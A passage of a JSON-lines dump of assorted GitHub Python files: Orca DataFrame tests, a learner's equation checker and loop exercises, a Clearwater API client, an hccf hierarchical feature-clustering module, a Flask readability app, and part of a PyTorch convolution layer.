= pd.DataFrame(np.random.randn(8, 4), index=arrays)\n odf = orca.DataFrame(pdf)\n assert_frame_equal(odf.reorder_levels([1, 0], axis=0).to_pandas(), pdf.reorder_levels([1, 0], axis=0))\n\n def test_dataframe_reshaping_sorting_transposing_stack(self):\n pdf = pd.DataFrame([[0, 1], [2, 3]], index=['cat', 'dog'], columns=['weight', 'height'])\n odf = orca.DataFrame(pdf)\n # TODO: orca的结果不分组\n # assert_series_equal(odf.stack().to_pandas(), pdf.stack())\n pdf = pd.DataFrame([[1, 2], [2, 4]], index=['cat', 'dog'],\n columns=pd.MultiIndex.from_tuples([('weight', 'kg'), ('weight', 'pounds')]))\n odf = orca.DataFrame(pdf)\n # TODO: orca不支持multi level columns\n # assert_series_equal(odf.stack().to_pandas(), pdf.stack())\n pdf = pd.DataFrame({\"time\": pd.date_range(\"15:00:00\", periods=9, freq=\"30s\"),\n \"A\": [\"foo\", \"foo\", \"foo\", \"foo\", \"foo\", \"bar\", \"bar\", \"bar\", \"bar\"],\n \"B\": [\"one\", \"one\", \"one\", \"two\", \"two\", \"one\", \"one\", \"two\", \"two\"],\n \"C\": [\"small\", \"large\", \"large\", \"small\", \"small\", \"large\", \"small\", \"small\", \"large\"],\n \"D\": [1, 2, 2, 3, 3, 4, 5, 6, 7],\n \"E\": [2, 4, 5, 5, 6, 6, 8, 9, 9],\n \"F\": [2, 4, 5, 5, 6, 6, 8, 9, 9]})\n odf = orca.DataFrame(pdf)\n ptable = pdf.pivot_table(values='D', index=pdf.time.dt.minute, columns='A', aggfunc=\"sum\")\n otable = odf.pivot_table(values='D', index=odf.time.dt.minute, columns='A', aggfunc=\"sum\")\n # TODO: orca的结果不分组\n # assert_series_equal(otable.stack().to_pandas(), ptable.stack())\n\n def test_dataframe_reshaping_sorting_transposing_transpose_T(self):\n pdf = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})\n odf = orca.DataFrame(pdf)\n assert_frame_equal(odf.T.to_pandas(), pdf.T)\n assert_frame_equal(odf.transpose().to_pandas(), pdf.transpose())\n assert_frame_equal(odf.transpose(copy=True).to_pandas(), pdf.transpose(copy=True))\n\n # TODO:transpose on non-numerical types of matrix is not allowed in Orca\n pdf = pd.DataFrame({'name': ['Alice', 'Bob'], 'grade': ['A', 'B'], 'Gender': ['female', 'male']})\n odf = orca.DataFrame(pdf)\n\n def test_dataframe_reshaping_sorting_transposing_melt(self):\n pdf = pd.DataFrame({\"time\": pd.date_range(\"15:00:00\", periods=9, freq=\"30s\"),\n \"A\": [\"foo\", \"foo\", \"foo\", \"foo\", \"foo\", \"bar\", \"bar\", \"bar\", \"bar\"],\n \"B\": [\"one\", \"one\", \"one\", \"two\", \"two\", \"one\", \"one\", \"two\", \"two\"],\n \"C\": [\"small\", \"large\", \"large\", \"small\", \"small\", 
\"large\", \"small\", \"small\", \"large\"],\n \"D\": [1, 2, 2, 3, 3, 4, 5, 6, 7],\n \"E\": [2, 4, 5, 5, 6, 6, 8, 9, 9],\n \"F\": [2, 4, 5, 5, 6, 6, 8, 9, 9]})\n odf = orca.DataFrame(pdf)\n ptable=pdf.melt(id_vars=['A', 'B'], value_vars=['D', 'E'])\n otable = odf.melt(id_vars=['A', 'B'], value_vars=['D', 'E'])\n assert_frame_equal(otable.to_pandas(), ptable)\n\n ptable = pdf.melt(id_vars='A', value_vars='D', var_name=\"myVarname\", value_name=\"myValname\")\n otable = odf.melt(id_vars='A', value_vars='D', var_name=\"myVarname\", value_name=\"myValname\")\n assert_frame_equal(otable.to_pandas(), ptable)\n\n pdf = pd.DataFrame({'A': {0: 101, 1: 102, 2: 103}, 'B': {0: 1, 1: 3, 2: 5}, 'C': {0: 2, 1: 4, 2: 6}})\n odf = orca.DataFrame(pdf)\n ptable = pdf.melt()\n otable = odf.melt()\n assert_frame_equal(otable.to_pandas(), ptable)\n\n ptable = pdf.melt(id_vars=['A'])\n otable = odf.melt(id_vars=['A'])\n assert_frame_equal(otable.to_pandas(), ptable)\n\n ptable = pdf.melt(value_vars=['A'])\n otable = odf.melt(value_vars=['A'])\n assert_frame_equal(otable.to_pandas(), ptable)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"dolphindb/Orca","sub_path":"tests/orca_unit_testing/test_dataframe_reshaping_sorting.py","file_name":"test_dataframe_reshaping_sorting.py","file_ext":"py","file_size_in_byte":8420,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"35"} +{"seq_id":"1548674035","text":"#Creator: Saksham Singh\n#Stage: Beta\n#Purpose: 1 - 2 variable equations\n#Purpose: Tell user if values are true or false\n#Last update: 2/9/19\n#________________________________________________________________________________________________\n\nprint(\"Version: Beta\")\nprint(\"This program will tell you if the values you entered for an equation are true\")\n\n#Asking value\n\ncoeff = float(input(\"Coefficient of the first variable: \"))\ncoeff2 = float(input(\"Coefficient of the second variable: \"))\noperation = input(\"Enter the operator in between the two variables/coefficients: \")\nendnum = float(input(\"Enter the equality: \"))\n\n#Creating something for multiplying the two coefficents\n\nendvar1 = coeff * var1\nendvar2 = coeff2 * var2\n\n#Finding out the operator\n\nif operation == \"+\":\n equation = endvar1 + endvar2\nif operation == \"*\" or operation ==\"x\" or operation == \"X\":\n equation = endvar1 * endvar2\nif operation == \"-\":\n equation = endvar1 - endvar2\nif operation == \"/\":\n equation = endvar1/endvar2\nif operation == \"^\":\n equation = endvar1^endvar2\n\n#End result\n\nif equation == endnum:\n print(\"YEEEEEEET. Those coordinates are on the line of your equation! (Those values make the equation true)! \")\nelse:\n print(\"Uh, oh. 
Those values don't work!\")\n","repo_name":"rks27/pythonLearning","sub_path":"saksham/Variable Equations.py","file_name":"Variable Equations.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25521120249","text":"import requests\n\n\nclass Clearwater:\n def __init__(self):\n self.host = 'https://www.clearwatertrackingsystem.com/api/v1'\n self.api_key = your_api_key\n self.headers = {'Accept': 'application/json'}\n\n def get_all_vessels(self):\n url = f'{self.host}/vessel?api_key={self.api_key}'\n response = requests.get(url, self.headers)\n\n if response.status_code != 200:\n return print('Error: '+response.json().get('message'))\n return response.json()\n\n def get_vessel_by_imo(self, imo: int):\n for vessel in self.get_all_vessels():\n if vessel.get('imo') == imo:\n return vessel\n else:\n return 'Vessel not found'\n\n def get_vessel_by_clearwater_id(self, clearwater_id: int):\n url = f'{self.host}/vessel/{clearwater_id}?api_key={self.api_key}'\n response = requests.get(url, self.headers)\n\n if response.status_code != 200:\n return print('Error: '+response.json().get('message'))\n return response.json()\n\n def get_all_alerts(self):\n url = f'{self.host}/alert?api_key={self.api_key}'\n response = requests.get(url, self.headers)\n\n if response.status_code != 200:\n return print('Error: '+response.json().get('message'))\n return response.json()\n\n def get_specific_alert(self, alert_id):\n url = f'{self.host}/alert/{alert_id}?api_key={self.api_key}'\n response = requests.get(url, self.headers)\n\n if response.status_code != 200:\n return print('Error: '+response.json().get('message'))\n return response.json()\n","repo_name":"owenvachell/clearwater_api_examples","sub_path":"clearwater.py","file_name":"clearwater.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14608798965","text":"# ПРИМЕР 1.\n# список пользователей, которые нужно проверить:\nusers = ['alice', 'brian', 'candace']\n\n# пустой список для хранения проверенных пользователей\nconfirmed_users = []\n\n# проверяем пользователей в users, пока остаются непроверенные.\n# проверенные пользователи перемещаются в confirmed_users\nwhile users:\n user = users.pop()\n print(f\"{user} is verifying\") # candace is verifying brian is verifying alice is verifying\n confirmed_users.append(user)\n\n# вывод проверенных пользователей\nfor confirmed_user in confirmed_users:\n print(confirmed_user) # candace brian alice\n\n# ПРИМЕР 2.\n# удаление всех вхождений конкретного значения cat в списке pets\npets = [\"cat\", 'dog', 'cat', 'rabbit', 'fish', 'cat']\n\nwhile 'cat' in pets:\n pets.remove('cat')\n\nprint(pets) # ['dog', 'rabbit', 'fish']\n\n# ПРИМЕР 3.\n# заполнение словаря данными, введенными пользователем\nresponses = {}\n\n# установка флага на продолжение опроса\npolling_active = True\nwhile polling_active:\n name = input(\"Enter your name: \")\n response = input('How are you feeling today? ')\n\n# Ответ сохраняется в словаре\n responses[name] = response\n\n# проверка продолжения опроса\n repeat = input('Would you add your mood? yes \\ no ')\n\n if repeat == 'no':\n polling_active = False\n# опрос завершен\n\n# выведем результаты опроса:\nprint('---Poll results---')\nfor name, response in responses.items():\n print(f\"{name}`s mood for today is: {response}\")\n\n# Упражнение 7.8 стр. 
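# In the Clearwater client above, `requests.get(url, self.headers)` passes the
# headers dict as the second positional argument, which is `params` -- so the
# Accept header goes out as a query string instead of a header. The keyword
# form fixes it; the timeout value is an assumption:
import requests

def get_json(url, headers):
    response = requests.get(url, headers=headers, timeout=10)
    response.raise_for_status()
    return response.json()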
142\npizza_orders = ['pepperoni', 'four_seasons', 'mozarella', 'mushrooms']\n\nfinished_pizzas = []\n\nwhile pizza_orders:\n pizza_order = pizza_orders.pop()\n print(f\"{pizza_order} is cooking\")\n finished_pizzas.append(pizza_order)\n\nfor finished_pizza in finished_pizzas:\n print(finished_pizza)\n\n# Упражнение 7.9 стр. 142\npizzas = ['pepperoni', 'four_seasons','pepperoni', 'mozarella', 'mushrooms', 'pepperoni']\n\nmessage = 'Pepperoni not cooking'\n\nwhile 'pepperoni' in pizzas:\n print(message)\n pizzas.remove('pepperoni')\n\nprint(pizzas)\n\n# Упражнение 7.10 стр. 142\n\ndict = {}\nPolling_continue = True\nwhile Polling_continue:\n name = input('Enter U name: ')\n city = input('Enter U city: ')\n dict[name] = city\n\n message = input('Do U want to continue? y \\ n')\n if message == 'n':\n Polling_continue = False\n\nprint(dict)\n","repo_name":"lilidemini/python_learning","sub_path":"14.4_WHILE_со_списками&словарями.py","file_name":"14.4_WHILE_со_списками&словарями.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12505348118","text":"from setuptools import setup\n\nascii_snake = \"\"\"\\\n --..,_ _,.--.\n `'.'. .'`__ o `;__.\n '.'. .'.'` '---'` `\n '.`'--....--'`.'\n `'--....--'`\n\"\"\"\n\nsetup(\n name='pycompseries',\n version='0.1',\n packages=['pycompseries'],\n install_requires=[],\n url='',\n license='BSD',\n author='mcXrd',\n author_email='',\n description=ascii_snake,\n long_description=open('README.md').read(),\n python_requires='>=3.6',\n entry_points={\n 'console_scripts': [\n 'pycompseries = pycompseries:main',\n ],\n },\n tests_require=['pytest']\n)\n","repo_name":"mcXrd/pycompseries","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34910637845","text":"# -*- coding: utf-8 -*-\nimport os\nimport itertools\nimport logging\nimport pickle\nimport copy\nimport multiprocessing\n\nfrom hccf.utils.tools import parse_vw_line, compose_vw_line\nfrom hccf.utils.mathematics import loglikelihood\n\n\nlog = logging.getLogger(__name__)\n\n\nclass Node(object):\n \"\"\"\n Класс представляющий узел бинарного дерева иерархии.\n \"\"\"\n def __init__(self, value, left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n\n def show(self, depth=0):\n \"\"\"\n Метод возвращяющий строку для печати дерева на экране\n\n :param depth: отсуп узла при отображении в консоли\n :return: строку для печати в консоли\n \"\"\"\n ret = \"\"\n\n # Print right branch\n if self.right is not None:\n ret += self.right.show(depth + 1)\n\n # Print own value\n ret += \"\\n\" + (\" \"*depth) + str(self.value)\n\n # Print left branch\n if self.left is not None:\n ret += self.left.show(depth + 1)\n\n return ret\n\n def get_leaves_parents(self, parents=None):\n \"\"\"\n Метод возвращяющий список родителей данного узла\n\n :param parents: list родители узла предыдущего уровня\n :return: list список родителей данного узла\n \"\"\"\n result = {}\n\n if parents is None:\n parents = []\n\n parents_copy = parents[:]\n if self.left is None and self.right is None:\n result[self.value] = parents_copy\n else:\n parents_copy.append(self.value)\n if self.left is not None:\n result.update(self.left.get_leaves_parents(parents_copy))\n if self.right is not None:\n result.update(self.right.get_leaves_parents(parents_copy))\n\n return result\n\n def 
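# calculate_pair_ll above scores a merge as the log-likelihood change from
# pooling two feature values. `loglikelihood` is imported from hccf and its
# sign convention is not shown; a plausible binomial form is assumed here
# just to make the criterion concrete:
import math

def loglikelihood(shows, clicks):  # assumed definition, not hccf's actual code
    if clicks in (0, shows):
        return 0.0
    p = clicks / shows
    return clicks * math.log(p) + (shows - clicks) * math.log(1 - p)

def merge_delta(a, b):  # a, b = (shows, clicks); closer to zero => safer merge
    pooled = (a[0] + b[0], a[1] + b[1])
    return loglikelihood(*pooled) - loglikelihood(*a) - loglikelihood(*b)

# similar click rates pool almost for free; dissimilar ones cost likelihood
print(merge_delta((100, 10), (100, 11)) > merge_delta((100, 10), (100, 40)))  # True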
to_gml(self):\n \"\"\"\n Метод возвращает GML отображение графа\n \"\"\"\n nodes, edges = self._gml()\n nodes[self.value] = self.value\n\n res = \"graph\\n[\\n\"\n for node_index, node_label in enumerate(nodes.keys()):\n nodes[node_label] = node_index\n res += (' node\\n [\\n id %i\\n label \"%s\"\\n ]\\n' %\n (node_index, node_label))\n for edge in edges:\n res += (' edge\\n [\\n source %i\\n target %i\\n ]\\n' %\n (nodes[edge[\"source\"]], nodes[edge[\"target\"]]))\n res += \"]\\n\"\n return res\n\n def _gml(self):\n nodes = {}\n edges = []\n\n if self.left is not None:\n nodes[self.left.value] = self.left.value\n edges.append({\n 'source': self.value,\n 'target': self.left.value,\n })\n left_nodes, left_edges = self.left._gml()\n nodes.update(left_nodes)\n edges += left_edges\n\n if self.right is not None:\n nodes[self.right.value] = self.right.value\n edges.append({\n 'source': self.value,\n 'target': self.right.value,\n })\n right_nodes, right_edges = self.right._gml()\n nodes.update(right_nodes)\n edges += right_edges\n\n return nodes, edges\n\n\ndef calculate_pair_ll(feature_value_pair):\n \"\"\"\n Функция, вычисляющая likelihood пары значений категориального фактора\n\n :param feature_value_pair: пара значений категориального фактора\n :return: float значение likelihood\n \"\"\"\n ll_pair = 0\n tmp_feature_value_data = {}\n for feature_value_pair_index in feature_value_pair:\n for feature_values, (shows, clicks) in FeatureClustering.feature_data[feature_value_pair_index].iteritems():\n ll_pair -= loglikelihood(shows, clicks)\n\n tmp_feature_values = list(feature_values)\n tmp_feature_values[FeatureClustering.feature_index] = None\n tmp_feature_values = tuple(tmp_feature_values)\n\n if tmp_feature_values not in tmp_feature_value_data.keys():\n tmp_feature_value_data[tmp_feature_values] = (shows, clicks)\n else:\n shows_tmp, clicks_tmp = tmp_feature_value_data[tmp_feature_values]\n tmp_feature_value_data[tmp_feature_values] = (shows + shows_tmp, clicks + clicks_tmp)\n\n for feature_values, (shows, clicks) in tmp_feature_value_data.iteritems():\n ll_pair += loglikelihood(shows, clicks)\n\n return ll_pair\n\n\nclass FeatureClustering(object):\n \"\"\"\n Класс для построения иерархической кластеризации значений категориальных факторов\n \"\"\"\n feature_data = None\n feature_index = None\n\n def __init__(self, processes=1):\n \"\"\"\n :param processes: количество процессов для параллельного режима, если =1, то однопоточный режим\n \"\"\"\n if not isinstance(processes, int) or processes < 1:\n raise ValueError('‘processes’ param has to be positive integer')\n\n self.processes = processes\n\n self.features_mapping = None\n self.features = None\n\n self.data = {}\n self.shows_count = 0\n self.clicks_count = 0\n self.trees = None\n\n def _preprocess_log(self, logfile, slice_features=None, parser=None):\n \"\"\"\n Метод обрабатывающий файл и инициализующий\n - словарь self.data, ключами которого являются пары значений в событиях,\n а значением количество кликов и показов\n - словарь self.features, ключи которого порядковые индексы факторов в файле,\n а значения – возможные значения данного фактора\n\n :param logfile: string файл для обработки\n :param slice_features: названия факторов, по которым происходит сред\n :param parser: название формата для обработка файла (vw | libffm)\n :return:\n \"\"\"\n if parser is None:\n parser = parse_vw_line\n\n for line in open(logfile):\n example_params = parser(line)\n if self.features is None:\n if slice_features is not None:\n self.features = [set() 
class FeatureClustering(object):\n    \"\"\"\n    Builds a hierarchical clustering of the values of categorical features.\n    \"\"\"\n    feature_data = None\n    feature_index = None\n\n    def __init__(self, processes=1):\n        \"\"\"\n        :param processes: number of processes for parallel mode; if 1, single-process mode is used\n        \"\"\"\n        if not isinstance(processes, int) or processes < 1:\n            raise ValueError(\"'processes' param has to be a positive integer\")\n\n        self.processes = processes\n\n        self.features_mapping = None\n        self.features = None\n\n        self.data = {}\n        self.shows_count = 0\n        self.clicks_count = 0\n        self.trees = None\n\n    def _preprocess_log(self, logfile, slice_features=None, parser=None):\n        \"\"\"\n        Process the input file and initialise\n        - the dict self.data, whose keys are the value tuples seen in the events\n        and whose values are the show and click counts\n        - the dict self.features, whose keys are the ordinal indexes of the features in the file\n        and whose values are the possible values of each feature\n\n        :param logfile: string file to process\n        :param slice_features: names of the features used as slices\n        :param parser: parser for the file format (vw | libffm)\n        :return:\n        \"\"\"\n        if parser is None:\n            parser = parse_vw_line\n\n        for line in open(logfile):\n            example_params = parser(line)\n            if self.features is None:\n                if slice_features is not None:\n                    self.features = [set() for i in xrange(len(slice_features))]\n                    self.features_mapping = dict([(feature_name, feature_index)\n                                                  for feature_index, feature_name in\n                                                  enumerate(slice_features)])\n                else:\n                    self.features = [set() for i in xrange(len(example_params['features']))]\n                    self.features_mapping = dict([(feature_name, feature_index)\n                                                  for feature_index, (feature_name, feature_value) in\n                                                  enumerate(example_params['features'])])\n\n            for feature_name, feature_value in example_params['features']:\n                feature_index = self.features_mapping.get(feature_name)\n                if feature_index is not None:\n                    self.features[feature_index].add(feature_value)\n\n            if slice_features is not None:\n                feature_example_dict = dict(example_params['features'])\n                example_values = tuple((feature_example_dict[feature_name] for feature_name in slice_features))\n            else:\n                example_values = tuple((feature_value for feature_name, feature_value in example_params['features']))\n\n            if example_values not in self.data:\n                self.data[example_values] = (0, 0)\n\n            shows, clicks = self.data[example_values]\n            shows += 1\n            self.shows_count += 1\n            if example_params['label'] > 0:\n                clicks += 1\n                self.clicks_count += 1\n            self.data[example_values] = (shows, clicks)\n\n    def gml_graph(self, feature):\n        \"\"\"\n        Return the value hierarchy of a categorical feature in GML format.\n        :param feature: feature name\n        :return: string\n        \"\"\"\n        if feature not in self.trees.keys():\n            raise ValueError('no hierarchy for feature `%s`' % feature)\n        return self.trees[feature].to_gml()\n\n    def convert_log(self, input_logfile, output_logfile, output_params, parser=None, composer=None):\n        \"\"\"\n        Convert the source dataset into a dataset with extra post-clustering features.\n\n        :param input_logfile: string input file\n        :param output_logfile: string output file\n        :param output_params: dict parameters of the extra features\n        output_params: {\n            'mode': <output_mode>,\n            'levels': 5\n        }\n\n        <output_mode>:\n        * full_tree - the full tree, from the root down to the leaves\n        * tree_without_leaves - the tree without its leaves\n        * part_tree\n\n        :param parser: func parser for the source dataset\n        :param composer: func composer for the output dataset\n        \"\"\"\n        if parser is None:\n            parser = parse_vw_line\n\n        if composer is None:\n            composer = compose_vw_line\n\n        output_file = open(output_logfile, 'w+')\n        output_mode = output_params.get('mode', 'full_tree')\n        feature_mapping = {}\n\n        for feature_name, feature_tree in self.trees.iteritems():\n            feature_mapping[feature_name] = feature_tree.get_leaves_parents()\n\n        for line in open(input_logfile):\n            example_params = parser(line)\n            features = []\n            for feature_name, feature_value in example_params['features']:\n                if feature_name in self.trees.keys():\n                    feature_value_tree = feature_mapping[feature_name].get(feature_value, [])\n                    if output_mode == 'full_tree':\n                        features.append((feature_name, feature_value))\n                    elif output_mode == 'tree_without_leaves':\n                        pass\n                    elif output_mode == 'part_tree':\n                        features.append((feature_name, feature_value))\n                        feature_value_tree = feature_value_tree[len(feature_value_tree) - output_params['levels']: len(feature_value_tree)]\n                    features.append((feature_name + '_tree', feature_value_tree))\n                else:\n                    features.append((feature_name, feature_value))\n\n            output_file.write(composer(example_params['label'], features) + '\\n')\n\n    def cluster(self, input_logfile, tree_features, slice_features=None, parser=None):\n        \"\"\"\n        Build the value hierarchies of the categorical features.\n\n        :param input_logfile: string input file\n        :param tree_features: list of names of the categorical features to cluster\n        :param slice_features: list of \"slices\" used while building the hierarchy\n        :param parser: func parser for the source dataset\n        :return: dict of trees (cluster hierarchies), one per categorical feature passed in tree_features\n        \"\"\"\n        if not os.path.isfile(input_logfile):\n            raise ValueError('no input file `%s` found' % input_logfile)\n        elif len(tree_features) <= 0:\n            raise ValueError('`tree_features` param was not passed')\n\n        features = copy.copy(tree_features)\n        if slice_features is not None:\n            features += slice_features\n        features = list(set(features))\n        self._preprocess_log(input_logfile, slice_features=features, parser=parser)\n\n        feature_names = self.features_mapping.keys()\n        for feature_name in tree_features:\n            if feature_name not in feature_names:\n                raise ValueError('feature `%s` was not found in input log' % feature_name)\n\n        self.trees = {}\n        for feature_name in tree_features:\n            if self.processes > 1:\n                self.trees[feature_name] = self._cluster_feature_parallel(feature_name)\n            else:\n                self.trees[feature_name] = self._cluster_feature(feature_name)\n        return self.trees\n\n    def _join_feature_value_pair(self, feature_index, feature_value_pair, feature_data):\n        \"\"\"\n        Merge a pair of values into one cluster.\n\n        :param feature_index: int\n        :param feature_value_pair: tuple (feature_value1, feature_value2)\n        :param feature_data: dict\n        :return: dict\n        \"\"\"\n        tmp_feature_value_data = {}\n        for feature_value_pair_index in feature_value_pair:\n            for feature_values, (shows, clicks) in feature_data[feature_value_pair_index].iteritems():\n                tmp_feature_values = list(feature_values)\n                tmp_feature_values[feature_index] = None\n                tmp_feature_values = tuple(tmp_feature_values)\n\n                if tmp_feature_values not in tmp_feature_value_data.keys():\n                    tmp_feature_value_data[tmp_feature_values] = (shows, clicks)\n                else:\n                    shows_tmp, clicks_tmp = tmp_feature_value_data[tmp_feature_values]\n                    tmp_feature_value_data[tmp_feature_values] = (shows + shows_tmp, clicks + clicks_tmp)\n        return tmp_feature_value_data\n\n    def _cluster_feature_parallel(self, feature_name):\n        \"\"\"\n        Build the value hierarchy of a categorical feature in multi-process mode.\n        The number of processes is set in the constructor (the `processes` param).\n\n        :param feature_name: string name of the categorical feature\n        :return: Node tree (cluster hierarchy) for the categorical feature\n        \"\"\"\n        feature_index = FeatureClustering.feature_index = self.features_mapping[feature_name]\n        FeatureClustering.feature_data = {}\n        for feature_value, data in self.data.iteritems():\n            feature_value_data = FeatureClustering.feature_data.setdefault(feature_value[feature_index], {})\n            feature_value_data[feature_value] = data\n\n        current_extra_node_index = 1\n        extra_nodes = {}\n\n        while len(FeatureClustering.feature_data.keys()) > 1:\n            pool = multiprocessing.Pool(self.processes)\n            min_ll_pair_delta = float(\"inf\")\n            min_pair = None\n\n            feature_value_pairs = list(itertools.combinations(FeatureClustering.feature_data.keys(), r=2))\n            feature_value_ll = pool.map(calculate_pair_ll, feature_value_pairs)\n\n            for i in xrange(len(feature_value_ll)):\n                if feature_value_ll[i] <= min_ll_pair_delta:\n                    min_pair = feature_value_pairs[i]\n                    min_ll_pair_delta = feature_value_ll[i]\n\n            tmp_feature_value_data = self._join_feature_value_pair(\n                feature_index,\n                min_pair,\n                FeatureClustering.feature_data,\n            )\n\n            for feature_value_pair_index in min_pair:\n                del FeatureClustering.feature_data[feature_value_pair_index]\n\n
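            # (added comment) the merged pair is replaced below by a synthetic cluster node labelled 'N*'\n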
            current_extra_node_label = str(current_extra_node_index) + '*'\n            FeatureClustering.feature_data[current_extra_node_label] = tmp_feature_value_data\n\n            extra_nodes[current_extra_node_label] = Node(\n                current_extra_node_label,\n                left=extra_nodes.get(min_pair[0], Node(min_pair[0])),\n                right=extra_nodes.get(min_pair[1], Node(min_pair[1])),\n            )\n            current_extra_node_index += 1\n            log.debug('min_pair %s, extra_node_index=%s, min_ll_pair=%s', min_pair, current_extra_node_index, min_ll_pair_delta)\n            pool.close()\n            pool.join()\n\n        tree = extra_nodes[FeatureClustering.feature_data.keys()[0]]\n        return tree\n\n    def _cluster_feature(self, feature_name):\n        \"\"\"\n        Build the value hierarchy of a categorical feature in single-process mode.\n\n        :param feature_name: string name of the categorical feature\n        :return: Node tree (cluster hierarchy) for the categorical feature\n        \"\"\"\n        feature_index = self.features_mapping[feature_name]\n        feature_data = {}\n        # For speed, re-key the data into a dict whose keys are\n        # the values of the feature being clustered\n        for feature_value, data in self.data.iteritems():\n            feature_value_data = feature_data.setdefault(feature_value[feature_index], {})\n            feature_value_data[feature_value] = data\n\n        current_extra_node_index = 1\n        extra_nodes = {}\n\n        while len(feature_data.keys()) > 1:\n            # Initialise the parameters used to pick the pair of values to merge\n            min_ll_pair = float(\"inf\")\n            min_pair = None\n            min_tmp_feature_value_data = None\n\n            # Build every pair of values of the feature being clustered\n            for feature_value_pair in itertools.combinations(feature_data.keys(), r=2):\n                ll_pair = 0\n                tmp_feature_value_data = {}\n                for feature_value_pair_index in feature_value_pair:\n                    for feature_values, (shows, clicks) in feature_data[feature_value_pair_index].iteritems():\n                        ll_pair -= loglikelihood(shows, clicks)\n\n                        tmp_feature_values = list(feature_values)\n                        tmp_feature_values[feature_index] = None\n                        tmp_feature_values = tuple(tmp_feature_values)\n\n                        if tmp_feature_values not in tmp_feature_value_data.keys():\n                            tmp_feature_value_data[tmp_feature_values] = (shows, clicks)\n                        else:\n                            shows_tmp, clicks_tmp = tmp_feature_value_data[tmp_feature_values]\n                            tmp_feature_value_data[tmp_feature_values] = (shows + shows_tmp, clicks + clicks_tmp)\n\n                for feature_values, (shows, clicks) in tmp_feature_value_data.iteritems():\n                    ll_pair += loglikelihood(shows, clicks)\n\n                if ll_pair <= min_ll_pair:\n                    min_ll_pair = ll_pair\n                    min_pair = feature_value_pair\n                    min_tmp_feature_value_data = tmp_feature_value_data.copy()\n\n            for feature_value_pair_index in min_pair:\n                del feature_data[feature_value_pair_index]\n\n            current_extra_node_label = str(current_extra_node_index) + '*'\n            feature_data[current_extra_node_label] = min_tmp_feature_value_data\n\n            # Add a new node to the tree (the cluster hierarchy)\n            extra_nodes[current_extra_node_label] = Node(\n                current_extra_node_label,\n                left=extra_nodes.get(min_pair[0], Node(min_pair[0])),\n                right=extra_nodes.get(min_pair[1], Node(min_pair[1])),\n            )\n            current_extra_node_index += 1\n            log.debug('min_pair %s, extra_node_index=%s, min_ll_pair=%s', min_pair, current_extra_node_index, min_ll_pair)\n\n        tree = extra_nodes[feature_data.keys()[0]]\n        return tree\n\n    @staticmethod\n    def load(filename):\n        \"\"\"\n        Load a hierarchical clustering model from a file.\n        :return: FeatureClustering\n        \"\"\"\n        f = file(filename)\n        model = pickle.loads(f.read())\n        f.close()\n        return model\n\n
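    # Hypothetical round trip (added comment; file and feature names are illustrative):\n    #   fc = FeatureClustering(processes=2)\n    #   fc.cluster('train.vw', ['campaign_id'])\n    #   fc.save('clusters.pkl')\n    #   fc = FeatureClustering.load('clusters.pkl')\n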
    def save(self, filename):\n        \"\"\"\n        Save the hierarchical clustering model to a file.\n        \"\"\"\n        f = file(filename, 'w+')\n        f.write(pickle.dumps(self))\n        f.close()\n","repo_name":"kazarinov/hccf","sub_path":"hccf/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":21522,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"27708326937","text":"from flask import Flask, jsonify, request, render_template, url_for, redirect\nfrom torch_utils import get_predictions, text_to_tensor\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods = [\"POST\", \"GET\"])\ndef home():\n    if request.method == 'POST':\n        text1 = request.form[\"nm1\"]\n        text2 = request.form[\"nm2\"]\n\n        ids1, mask1 = text_to_tensor(text1)\n        prediction1 = get_predictions(ids1, mask1)\n        ids2, mask2 = text_to_tensor(text2)\n        prediction2 = get_predictions(ids2, mask2)\n        if prediction1>prediction2:\n            return render_template(\"index.html\", prediction1 = \"Text A is the easiest to read !\")\n        else:\n            return render_template(\"index.html\", prediction1 = \"Text B is the easiest to read !\")\n\n    else:\n        return render_template(\"index.html\") \n\nif __name__ == '__main__':\n    app.run(debug=True)","repo_name":"gaetanlop/Commonlit-Readability-Competition","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"33833752869","text":"import torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom torch.nn import Parameter\nfrom torch.nn.modules.utils import _pair  # needed by the _pair(0) calls below\nimport numpy as np\nfrom torch import Tensor\n\nNOISE_SCALE = 1e-12\n\nclass LinearConv2D(nn.Conv2d):\n    def __init__(\n        self,\n        in_channels: int,\n        out_channels: int,\n        kernel_size,\n        stride=1,\n        padding=0,\n        dilation=1,\n        groups: int = 1,\n        bias: bool = True,\n        padding_mode: str = 'zeros'  # TODO: refine this type\n    ):\n        super().__init__(in_channels, out_channels, kernel_size, stride, padding, dilation\n                         ,groups, bias, padding_mode)\n\n        self.linear_weight = Parameter(torch.zeros_like(self.weight, requires_grad=True) + NOISE_SCALE)\n        if bias:\n            self.linear_bias = Parameter(torch.zeros_like(self.bias, requires_grad=True) + NOISE_SCALE)\n        else:\n            self.linear_bias = None\n\n    def _linear_forward(self, input: Tensor) -> Tensor:\n        if self.padding_mode != 'zeros':\n            return F.conv2d(F.pad(input, self._reversed_padding_repeated_twice, mode=self.padding_mode),\n                            self.linear_weight, self.linear_bias, self.stride,\n                            _pair(0), self.dilation, self.groups)\n        return F.conv2d(input, self.linear_weight, self.linear_bias, self.stride,\n                        self.padding, self.dilation, self.groups)\n\n    def _conv_forward(self, input: Tensor, add_bias: bool = True) -> Tensor:\n        bias = self.bias if add_bias else None\n        if self.padding_mode != 'zeros':\n            return F.conv2d(F.pad(input, 